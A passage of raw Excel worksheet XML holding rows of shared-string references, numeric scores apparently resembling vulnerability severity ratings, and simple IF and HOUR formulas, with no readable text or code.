      <c r="F193" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G193" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H193" s="4">
        <v>5.3</v>
      </c>
      <c r="I193" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J193" s="4"/>
      <c r="K193" s="4"/>
      <c r="L193" s="4">
        <f>IF(out!$G193="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M193" s="4"/>
      <c r="N193" s="4"/>
      <c r="O193" s="13"/>
      <c r="P193" s="4"/>
      <c r="Q193" s="13">
        <f>HOUR(out!$P193 -out!$N193)</f>
        <v>0</v>
      </c>
      <c r="R193" s="18"/>
      <c r="S193" s="4"/>
      <c r="T193" s="4"/>
      <c r="U193" s="4"/>
      <c r="V193" s="7"/>
    </row>
    <row r="194" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A194" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B194" s="4" t="s">
        <v>1346</v>
      </c>
      <c r="C194" s="4" t="s">
        <v>1347</v>
      </c>
      <c r="D194" s="4" t="s">
        <v>1348</v>
      </c>
      <c r="E194" s="4" t="s">
        <v>1349</v>
      </c>
      <c r="F194" s="4" t="s">
        <v>1350</v>
      </c>
      <c r="G194" s="4" t="s">
        <v>1351</v>
      </c>
      <c r="H194" s="4">
        <v>7.5</v>
      </c>
      <c r="I194" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J194" s="4"/>
      <c r="K194" s="4"/>
      <c r="L194" s="4">
        <f>IF(out!$G194="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M194" s="4"/>
      <c r="N194" s="4"/>
      <c r="O194" s="13"/>
      <c r="P194" s="4"/>
      <c r="Q194" s="13">
        <f>HOUR(out!$P194 -out!$N194)</f>
        <v>0</v>
      </c>
      <c r="R194" s="18"/>
      <c r="S194" s="4"/>
      <c r="T194" s="4"/>
      <c r="U194" s="4"/>
      <c r="V194" s="7"/>
    </row>
    <row r="195" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A195" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B195" s="4" t="s">
        <v>1352</v>
      </c>
      <c r="C195" s="4" t="s">
        <v>1353</v>
      </c>
      <c r="D195" s="4" t="s">
        <v>1354</v>
      </c>
      <c r="E195" s="4" t="s">
        <v>1355</v>
      </c>
      <c r="F195" s="4" t="s">
        <v>1356</v>
      </c>
      <c r="G195" s="4" t="s">
        <v>1357</v>
      </c>
      <c r="H195" s="4">
        <v>3.7</v>
      </c>
      <c r="I195" s="4" t="s">
        <v>71</v>
      </c>
      <c r="J195" s="4"/>
      <c r="K195" s="4"/>
      <c r="L195" s="4">
        <f>IF(out!$G195="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M195" s="4"/>
      <c r="N195" s="4"/>
      <c r="O195" s="13"/>
      <c r="P195" s="4"/>
      <c r="Q195" s="13">
        <f>HOUR(out!$P195 -out!$N195)</f>
        <v>0</v>
      </c>
      <c r="R195" s="18"/>
      <c r="S195" s="4"/>
      <c r="T195" s="4"/>
      <c r="U195" s="4"/>
      <c r="V195" s="7"/>
    </row>
    <row r="196" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A196" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B196" s="4" t="s">
        <v>1358</v>
      </c>
      <c r="C196" s="4" t="s">
        <v>1359</v>
      </c>
      <c r="D196" s="4" t="s">
        <v>1360</v>
      </c>
      <c r="E196" s="4" t="s">
        <v>1361</v>
      </c>
      <c r="F196" s="4" t="s">
        <v>1362</v>
      </c>
      <c r="G196" s="4" t="s">
        <v>1363</v>
      </c>
      <c r="H196" s="4">
        <v>7.5</v>
      </c>
      <c r="I196" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J196" s="4"/>
      <c r="K196" s="4"/>
      <c r="L196" s="4">
        <f>IF(out!$G196="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M196" s="4"/>
      <c r="N196" s="4"/>
      <c r="O196" s="13"/>
      <c r="P196" s="4"/>
      <c r="Q196" s="13">
        <f>HOUR(out!$P196 -out!$N196)</f>
        <v>0</v>
      </c>
      <c r="R196" s="18"/>
      <c r="S196" s="4"/>
      <c r="T196" s="4"/>
      <c r="U196" s="4"/>
      <c r="V196" s="7"/>
    </row>
    <row r="197" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A197" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B197" s="4" t="s">
        <v>1364</v>
      </c>
      <c r="C197" s="4" t="s">
        <v>1365</v>
      </c>
      <c r="D197" s="4" t="s">
        <v>1366</v>
      </c>
      <c r="E197" s="4" t="s">
        <v>1367</v>
      </c>
      <c r="F197" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G197" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H197" s="4">
        <v>7.5</v>
      </c>
      <c r="I197" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J197" s="4"/>
      <c r="K197" s="4"/>
      <c r="L197" s="4">
        <f>IF(out!$G197="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M197" s="4"/>
      <c r="N197" s="4"/>
      <c r="O197" s="13"/>
      <c r="P197" s="4"/>
      <c r="Q197" s="13">
        <f>HOUR(out!$P197 -out!$N197)</f>
        <v>0</v>
      </c>
      <c r="R197" s="18"/>
      <c r="S197" s="4"/>
      <c r="T197" s="4"/>
      <c r="U197" s="4"/>
      <c r="V197" s="7"/>
    </row>
    <row r="198" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A198" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B198" s="4" t="s">
        <v>1368</v>
      </c>
      <c r="C198" s="4" t="s">
        <v>1369</v>
      </c>
      <c r="D198" s="4" t="s">
        <v>1370</v>
      </c>
      <c r="E198" s="4" t="s">
        <v>1371</v>
      </c>
      <c r="F198" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G198" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H198" s="4">
        <v>7.5</v>
      </c>
      <c r="I198" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J198" s="4"/>
      <c r="K198" s="4"/>
      <c r="L198" s="4">
        <f>IF(out!$G198="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M198" s="4"/>
      <c r="N198" s="4"/>
      <c r="O198" s="13"/>
      <c r="P198" s="4"/>
      <c r="Q198" s="13">
        <f>HOUR(out!$P198 -out!$N198)</f>
        <v>0</v>
      </c>
      <c r="R198" s="18"/>
      <c r="S198" s="4"/>
      <c r="T198" s="4"/>
      <c r="U198" s="4"/>
      <c r="V198" s="7"/>
    </row>
    <row r="199" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A199" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B199" s="4" t="s">
        <v>1372</v>
      </c>
      <c r="C199" s="4" t="s">
        <v>1373</v>
      </c>
      <c r="D199" s="4" t="s">
        <v>1374</v>
      </c>
      <c r="E199" s="4" t="s">
        <v>1375</v>
      </c>
      <c r="F199" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G199" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H199" s="4">
        <v>7.5</v>
      </c>
      <c r="I199" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J199" s="4"/>
      <c r="K199" s="4"/>
      <c r="L199" s="4">
        <f>IF(out!$G199="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M199" s="4"/>
      <c r="N199" s="4"/>
      <c r="O199" s="13"/>
      <c r="P199" s="4"/>
      <c r="Q199" s="13">
        <f>HOUR(out!$P199 -out!$N199)</f>
        <v>0</v>
      </c>
      <c r="R199" s="18"/>
      <c r="S199" s="4"/>
      <c r="T199" s="4"/>
      <c r="U199" s="4"/>
      <c r="V199" s="7"/>
    </row>
    <row r="200" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A200" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B200" s="4" t="s">
        <v>1376</v>
      </c>
      <c r="C200" s="4" t="s">
        <v>1377</v>
      </c>
      <c r="D200" s="4" t="s">
        <v>1378</v>
      </c>
      <c r="E200" s="4" t="s">
        <v>1379</v>
      </c>
      <c r="F200" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G200" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H200" s="4">
        <v>7.5</v>
      </c>
      <c r="I200" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J200" s="4"/>
      <c r="K200" s="4"/>
      <c r="L200" s="4">
        <f>IF(out!$G200="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M200" s="4"/>
      <c r="N200" s="4"/>
      <c r="O200" s="13"/>
      <c r="P200" s="4"/>
      <c r="Q200" s="13">
        <f>HOUR(out!$P200 -out!$N200)</f>
        <v>0</v>
      </c>
      <c r="R200" s="18"/>
      <c r="S200" s="4"/>
      <c r="T200" s="4"/>
      <c r="U200" s="4"/>
      <c r="V200" s="7"/>
    </row>
    <row r="201" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A201" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B201" s="4" t="s">
        <v>1380</v>
      </c>
      <c r="C201" s="4" t="s">
        <v>1381</v>
      </c>
      <c r="D201" s="4" t="s">
        <v>1382</v>
      </c>
      <c r="E201" s="4" t="s">
        <v>1383</v>
      </c>
      <c r="F201" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G201" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H201" s="4">
        <v>7.5</v>
      </c>
      <c r="I201" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J201" s="4"/>
      <c r="K201" s="4"/>
      <c r="L201" s="4">
        <f>IF(out!$G201="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M201" s="4"/>
      <c r="N201" s="4"/>
      <c r="O201" s="13"/>
      <c r="P201" s="4"/>
      <c r="Q201" s="13">
        <f>HOUR(out!$P201 -out!$N201)</f>
        <v>0</v>
      </c>
      <c r="R201" s="18"/>
      <c r="S201" s="4"/>
      <c r="T201" s="4"/>
      <c r="U201" s="4"/>
      <c r="V201" s="7"/>
    </row>
    <row r="202" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A202" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B202" s="4" t="s">
        <v>1384</v>
      </c>
      <c r="C202" s="4" t="s">
        <v>1385</v>
      </c>
      <c r="D202" s="4" t="s">
        <v>1386</v>
      </c>
      <c r="E202" s="4" t="s">
        <v>1387</v>
      </c>
      <c r="F202" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G202" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H202" s="4">
        <v>7.5</v>
      </c>
      <c r="I202" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J202" s="4"/>
      <c r="K202" s="4"/>
      <c r="L202" s="4">
        <f>IF(out!$G202="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M202" s="4"/>
      <c r="N202" s="4"/>
      <c r="O202" s="13"/>
      <c r="P202" s="4"/>
      <c r="Q202" s="13">
        <f>HOUR(out!$P202 -out!$N202)</f>
        <v>0</v>
      </c>
      <c r="R202" s="18"/>
      <c r="S202" s="4"/>
      <c r="T202" s="4"/>
      <c r="U202" s="4"/>
      <c r="V202" s="7"/>
    </row>
    <row r="203" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A203" s="3" t="s">
        <v>1388</v>
      </c>
      <c r="B203" s="4" t="s">
        <v>1389</v>
      </c>
      <c r="C203" s="4" t="s">
        <v>1390</v>
      </c>
      <c r="D203" s="4" t="s">
        <v>1391</v>
      </c>
      <c r="E203" s="4" t="s">
        <v>1392</v>
      </c>
      <c r="F203" s="4" t="s">
        <v>1393</v>
      </c>
      <c r="G203" s="4" t="s">
        <v>1394</v>
      </c>
      <c r="H203" s="4">
        <v>3.7</v>
      </c>
      <c r="I203" s="4" t="s">
        <v>71</v>
      </c>
      <c r="J203" s="4"/>
      <c r="K203" s="4"/>
      <c r="L203" s="4">
        <f>IF(out!$G203="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M203" s="4"/>
      <c r="N203" s="4"/>
      <c r="O203" s="13"/>
      <c r="P203" s="4"/>
      <c r="Q203" s="13">
        <f>HOUR(out!$P203 -out!$N203)</f>
        <v>0</v>
      </c>
      <c r="R203" s="18"/>
      <c r="S203" s="4"/>
      <c r="T203" s="4"/>
      <c r="U203" s="4"/>
      <c r="V203" s="7"/>
    </row>
    <row r="204" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A204" s="3" t="s">
        <v>314</v>
      </c>
      <c r="B204" s="4" t="s">
        <v>1395</v>
      </c>
      <c r="C204" s="4" t="s">
        <v>1396</v>
      </c>
      <c r="D204" s="4" t="s">
        <v>1397</v>
      </c>
      <c r="E204" s="4" t="s">
        <v>1398</v>
      </c>
      <c r="F204" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G204" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H204" s="4">
        <v>6.3</v>
      </c>
      <c r="I204" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J204" s="4"/>
      <c r="K204" s="4"/>
      <c r="L204" s="4">
        <f>IF(out!$G204="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M204" s="4"/>
      <c r="N204" s="4"/>
      <c r="O204" s="13"/>
      <c r="P204" s="4"/>
      <c r="Q204" s="13">
        <f>HOUR(out!$P204 -out!$N204)</f>
        <v>0</v>
      </c>
      <c r="R204" s="18"/>
      <c r="S204" s="4"/>
      <c r="T204" s="4"/>
      <c r="U204" s="4"/>
      <c r="V204" s="7"/>
    </row>
    <row r="205" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A205" s="3" t="s">
        <v>1399</v>
      </c>
      <c r="B205" s="4" t="s">
        <v>1400</v>
      </c>
      <c r="C205" s="4" t="s">
        <v>1401</v>
      </c>
      <c r="D205" s="4" t="s">
        <v>1402</v>
      </c>
      <c r="E205" s="4" t="s">
        <v>1403</v>
      </c>
      <c r="F205" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G205" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H205" s="4">
        <v>6.3</v>
      </c>
      <c r="I205" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J205" s="4"/>
      <c r="K205" s="4"/>
      <c r="L205" s="4">
        <f>IF(out!$G205="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M205" s="4"/>
      <c r="N205" s="4"/>
      <c r="O205" s="13"/>
      <c r="P205" s="4"/>
      <c r="Q205" s="13">
        <f>HOUR(out!$P205 -out!$N205)</f>
        <v>0</v>
      </c>
      <c r="R205" s="18"/>
      <c r="S205" s="4"/>
      <c r="T205" s="4"/>
      <c r="U205" s="4"/>
      <c r="V205" s="7"/>
    </row>
    <row r="206" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A206" s="3" t="s">
        <v>1404</v>
      </c>
      <c r="B206" s="4" t="s">
        <v>1405</v>
      </c>
      <c r="C206" s="4" t="s">
        <v>1406</v>
      </c>
      <c r="D206" s="4" t="s">
        <v>1407</v>
      </c>
      <c r="E206" s="4" t="s">
        <v>1408</v>
      </c>
      <c r="F206" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G206" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H206" s="4">
        <v>3.6</v>
      </c>
      <c r="I206" s="4" t="s">
        <v>71</v>
      </c>
      <c r="J206" s="4"/>
      <c r="K206" s="4"/>
      <c r="L206" s="4">
        <f>IF(out!$G206="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M206" s="4"/>
      <c r="N206" s="4"/>
      <c r="O206" s="13"/>
      <c r="P206" s="4"/>
      <c r="Q206" s="13">
        <f>HOUR(out!$P206 -out!$N206)</f>
        <v>0</v>
      </c>
      <c r="R206" s="18"/>
      <c r="S206" s="4"/>
      <c r="T206" s="4"/>
      <c r="U206" s="4"/>
      <c r="V206" s="7"/>
    </row>
    <row r="207" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A207" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B207" s="4" t="s">
        <v>1409</v>
      </c>
      <c r="C207" s="4" t="s">
        <v>1410</v>
      </c>
      <c r="D207" s="4" t="s">
        <v>1411</v>
      </c>
      <c r="E207" s="4" t="s">
        <v>1412</v>
      </c>
      <c r="F207" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G207" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H207" s="4">
        <v>7.5</v>
      </c>
      <c r="I207" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J207" s="4"/>
      <c r="K207" s="4"/>
      <c r="L207" s="4">
        <f>IF(out!$G207="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M207" s="4"/>
      <c r="N207" s="4"/>
      <c r="O207" s="13"/>
      <c r="P207" s="4"/>
      <c r="Q207" s="13">
        <f>HOUR(out!$P207 -out!$N207)</f>
        <v>0</v>
      </c>
      <c r="R207" s="18"/>
      <c r="S207" s="4"/>
      <c r="T207" s="4"/>
      <c r="U207" s="4"/>
      <c r="V207" s="7"/>
    </row>
    <row r="208" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A208" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B208" s="4" t="s">
        <v>1413</v>
      </c>
      <c r="C208" s="4" t="s">
        <v>1414</v>
      </c>
      <c r="D208" s="4" t="s">
        <v>1415</v>
      </c>
      <c r="E208" s="4" t="s">
        <v>1416</v>
      </c>
      <c r="F208" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G208" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H208" s="4">
        <v>7.5</v>
      </c>
      <c r="I208" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J208" s="4"/>
      <c r="K208" s="4"/>
      <c r="L208" s="4">
        <f>IF(out!$G208="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M208" s="4"/>
      <c r="N208" s="4"/>
      <c r="O208" s="13"/>
      <c r="P208" s="4"/>
      <c r="Q208" s="13">
        <f>HOUR(out!$P208 -out!$N208)</f>
        <v>0</v>
      </c>
      <c r="R208" s="18"/>
      <c r="S208" s="4"/>
      <c r="T208" s="4"/>
      <c r="U208" s="4"/>
      <c r="V208" s="7"/>
    </row>
    <row r="209" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A209" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B209" s="4" t="s">
        <v>1417</v>
      </c>
      <c r="C209" s="4" t="s">
        <v>1418</v>
      </c>
      <c r="D209" s="4" t="s">
        <v>1419</v>
      </c>
      <c r="E209" s="4" t="s">
        <v>1420</v>
      </c>
      <c r="F209" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G209" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H209" s="4">
        <v>7.5</v>
      </c>
      <c r="I209" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J209" s="4"/>
      <c r="K209" s="4"/>
      <c r="L209" s="4">
        <f>IF(out!$G209="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M209" s="4"/>
      <c r="N209" s="4"/>
      <c r="O209" s="13"/>
      <c r="P209" s="4"/>
      <c r="Q209" s="13">
        <f>HOUR(out!$P209 -out!$N209)</f>
        <v>0</v>
      </c>
      <c r="R209" s="18"/>
      <c r="S209" s="4"/>
      <c r="T209" s="4"/>
      <c r="U209" s="4"/>
      <c r="V209" s="7"/>
    </row>
    <row r="210" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A210" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B210" s="4" t="s">
        <v>1421</v>
      </c>
      <c r="C210" s="4" t="s">
        <v>1422</v>
      </c>
      <c r="D210" s="4" t="s">
        <v>1423</v>
      </c>
      <c r="E210" s="4" t="s">
        <v>1424</v>
      </c>
      <c r="F210" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G210" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H210" s="4">
        <v>7.5</v>
      </c>
      <c r="I210" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J210" s="4"/>
      <c r="K210" s="4"/>
      <c r="L210" s="4">
        <f>IF(out!$G210="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M210" s="4"/>
      <c r="N210" s="4"/>
      <c r="O210" s="13"/>
      <c r="P210" s="4"/>
      <c r="Q210" s="13">
        <f>HOUR(out!$P210 -out!$N210)</f>
        <v>0</v>
      </c>
      <c r="R210" s="18"/>
      <c r="S210" s="4"/>
      <c r="T210" s="4"/>
      <c r="U210" s="4"/>
      <c r="V210" s="7"/>
    </row>
    <row r="211" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A211" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B211" s="4" t="s">
        <v>1425</v>
      </c>
      <c r="C211" s="4" t="s">
        <v>1426</v>
      </c>
      <c r="D211" s="4" t="s">
        <v>1427</v>
      </c>
      <c r="E211" s="4" t="s">
        <v>1428</v>
      </c>
      <c r="F211" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G211" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H211" s="4">
        <v>7.5</v>
      </c>
      <c r="I211" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J211" s="4"/>
      <c r="K211" s="4"/>
      <c r="L211" s="4">
        <f>IF(out!$G211="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M211" s="4"/>
      <c r="N211" s="4"/>
      <c r="O211" s="13"/>
      <c r="P211" s="4"/>
      <c r="Q211" s="13">
        <f>HOUR(out!$P211 -out!$N211)</f>
        <v>0</v>
      </c>
      <c r="R211" s="18"/>
      <c r="S211" s="4"/>
      <c r="T211" s="4"/>
      <c r="U211" s="4"/>
      <c r="V211" s="7"/>
    </row>
    <row r="212" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A212" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B212" s="4" t="s">
        <v>1429</v>
      </c>
      <c r="C212" s="4" t="s">
        <v>1430</v>
      </c>
      <c r="D212" s="4" t="s">
        <v>1431</v>
      </c>
      <c r="E212" s="4" t="s">
        <v>1432</v>
      </c>
      <c r="F212" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G212" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H212" s="4">
        <v>7.5</v>
      </c>
      <c r="I212" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J212" s="4"/>
      <c r="K212" s="4"/>
      <c r="L212" s="4">
        <f>IF(out!$G212="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M212" s="4"/>
      <c r="N212" s="4"/>
      <c r="O212" s="13"/>
      <c r="P212" s="4"/>
      <c r="Q212" s="13">
        <f>HOUR(out!$P212 -out!$N212)</f>
        <v>0</v>
      </c>
      <c r="R212" s="18"/>
      <c r="S212" s="4"/>
      <c r="T212" s="4"/>
      <c r="U212" s="4"/>
      <c r="V212" s="7"/>
    </row>
    <row r="213" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A213" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B213" s="4" t="s">
        <v>1433</v>
      </c>
      <c r="C213" s="4" t="s">
        <v>1434</v>
      </c>
      <c r="D213" s="4" t="s">
        <v>1435</v>
      </c>
      <c r="E213" s="4" t="s">
        <v>1436</v>
      </c>
      <c r="F213" s="4" t="s">
        <v>1437</v>
      </c>
      <c r="G213" s="4" t="s">
        <v>1438</v>
      </c>
      <c r="H213" s="4">
        <v>7.5</v>
      </c>
      <c r="I213" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J213" s="4"/>
      <c r="K213" s="4"/>
      <c r="L213" s="4">
        <f>IF(out!$G213="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M213" s="4"/>
      <c r="N213" s="4"/>
      <c r="O213" s="13"/>
      <c r="P213" s="4"/>
      <c r="Q213" s="13">
        <f>HOUR(out!$P213 -out!$N213)</f>
        <v>0</v>
      </c>
      <c r="R213" s="18"/>
      <c r="S213" s="4"/>
      <c r="T213" s="4"/>
      <c r="U213" s="4"/>
      <c r="V213" s="7"/>
    </row>
    <row r="214" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A214" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B214" s="4" t="s">
        <v>1439</v>
      </c>
      <c r="C214" s="4" t="s">
        <v>1440</v>
      </c>
      <c r="D214" s="4" t="s">
        <v>1441</v>
      </c>
      <c r="E214" s="4" t="s">
        <v>1442</v>
      </c>
      <c r="F214" s="4" t="s">
        <v>1443</v>
      </c>
      <c r="G214" s="4" t="s">
        <v>1444</v>
      </c>
      <c r="H214" s="4">
        <v>7.5</v>
      </c>
      <c r="I214" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J214" s="4"/>
      <c r="K214" s="4"/>
      <c r="L214" s="4">
        <f>IF(out!$G214="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M214" s="4"/>
      <c r="N214" s="4"/>
      <c r="O214" s="13"/>
      <c r="P214" s="4"/>
      <c r="Q214" s="13">
        <f>HOUR(out!$P214 -out!$N214)</f>
        <v>0</v>
      </c>
      <c r="R214" s="18"/>
      <c r="S214" s="4"/>
      <c r="T214" s="4"/>
      <c r="U214" s="4"/>
      <c r="V214" s="7"/>
    </row>
    <row r="215" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A215" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B215" s="4" t="s">
        <v>1445</v>
      </c>
      <c r="C215" s="4" t="s">
        <v>1446</v>
      </c>
      <c r="D215" s="4" t="s">
        <v>1447</v>
      </c>
      <c r="E215" s="4" t="s">
        <v>1448</v>
      </c>
      <c r="F215" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G215" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H215" s="4">
        <v>7.5</v>
      </c>
      <c r="I215" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J215" s="4"/>
      <c r="K215" s="4"/>
      <c r="L215" s="4">
        <f>IF(out!$G215="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M215" s="4"/>
      <c r="N215" s="4"/>
      <c r="O215" s="13"/>
      <c r="P215" s="4"/>
      <c r="Q215" s="13">
        <f>HOUR(out!$P215 -out!$N215)</f>
        <v>0</v>
      </c>
      <c r="R215" s="18"/>
      <c r="S215" s="4"/>
      <c r="T215" s="4"/>
      <c r="U215" s="4"/>
      <c r="V215" s="7"/>
    </row>
    <row r="216" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A216" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B216" s="4" t="s">
        <v>1449</v>
      </c>
      <c r="C216" s="4" t="s">
        <v>1450</v>
      </c>
      <c r="D216" s="4" t="s">
        <v>1451</v>
      </c>
      <c r="E216" s="4" t="s">
        <v>1452</v>
      </c>
      <c r="F216" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G216" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H216" s="4">
        <v>7.5</v>
      </c>
      <c r="I216" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J216" s="4"/>
      <c r="K216" s="4"/>
      <c r="L216" s="4">
        <f>IF(out!$G216="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M216" s="4"/>
      <c r="N216" s="4"/>
      <c r="O216" s="13"/>
      <c r="P216" s="4"/>
      <c r="Q216" s="13">
        <f>HOUR(out!$P216 -out!$N216)</f>
        <v>0</v>
      </c>
      <c r="R216" s="18"/>
      <c r="S216" s="4"/>
      <c r="T216" s="4"/>
      <c r="U216" s="4"/>
      <c r="V216" s="7"/>
    </row>
    <row r="217" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A217" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B217" s="4" t="s">
        <v>1453</v>
      </c>
      <c r="C217" s="4" t="s">
        <v>1454</v>
      </c>
      <c r="D217" s="4" t="s">
        <v>1455</v>
      </c>
      <c r="E217" s="4" t="s">
        <v>1456</v>
      </c>
      <c r="F217" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G217" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H217" s="4">
        <v>3.7</v>
      </c>
      <c r="I217" s="4" t="s">
        <v>71</v>
      </c>
      <c r="J217" s="4"/>
      <c r="K217" s="4"/>
      <c r="L217" s="4">
        <f>IF(out!$G217="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M217" s="4"/>
      <c r="N217" s="4"/>
      <c r="O217" s="13"/>
      <c r="P217" s="4"/>
      <c r="Q217" s="13">
        <f>HOUR(out!$P217 -out!$N217)</f>
        <v>0</v>
      </c>
      <c r="R217" s="18"/>
      <c r="S217" s="4"/>
      <c r="T217" s="4"/>
      <c r="U217" s="4"/>
      <c r="V217" s="7"/>
    </row>
    <row r="218" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A218" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B218" s="4" t="s">
        <v>1457</v>
      </c>
      <c r="C218" s="4" t="s">
        <v>1458</v>
      </c>
      <c r="D218" s="4" t="s">
        <v>1459</v>
      </c>
      <c r="E218" s="4" t="s">
        <v>1460</v>
      </c>
      <c r="F218" s="4" t="s">
        <v>1461</v>
      </c>
      <c r="G218" s="4" t="s">
        <v>1462</v>
